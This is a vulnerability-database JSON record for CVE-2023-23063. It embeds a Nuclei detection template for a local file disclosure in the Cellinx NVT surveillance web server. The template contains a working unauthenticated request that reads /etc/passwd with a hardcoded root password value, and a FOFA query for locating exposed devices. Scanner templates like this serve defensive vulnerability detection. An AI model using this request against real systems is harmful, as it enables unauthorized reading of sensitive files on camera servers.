{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-23063/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-23063/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-23063/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-23063/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-23063/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-23063"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-23063"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-23063.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-23063\n\ninfo:\n  name: Cellinx NVT Web Server - Local File Disclosure\n  author: daffainfo\n  severity: high\n  description: |\n    Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the server through the PATH parameter in GetFileContent.cgi, potentially exposing system credentials, configuration files, and sensitive video surveillance data.\n  remediation: |\n    Update Cellinx NVT to a version newer than 1.0.6.002b that validates file paths in GetFileContent.cgi and restricts file access to authorized directories only.\n  reference:\n    - https://github.com/ahmedalroky/Disclosures/tree/cellinx\n    - http://nvd.nist.gov/vuln/detail/CVE-2023-23063\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-23063\n    cwe-id: CWE-22\n    epss-score: 0.02431\n    epss-percentile: 0.83546\n    cpe: cpe:2.3:a:cellinx:nvt_web_server:1.0.6.002b:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: cellinx\n    product: nvt_web_server\n    fofa-query: body=\"/viewer/viewer.html\" && header=\"lighttpd\" && country=\"KR\"\n  tags: cve,cve2023,cellinx,lfi,nvt,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"regex('root:.*:0:0:', body)\"\n          - \"contains(header, 'TRACKID=')\"\n        condition: and\n# digest: 4b0a00483046022100d83cd970073be564c7abe960fd39f0b8ddb1f054306aebef24f8f8a5e3c56abd022100d102d40262e7cf3316766f05acb993be08ffee0d51a456eb5a299dfab2e47b7c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-23063"
}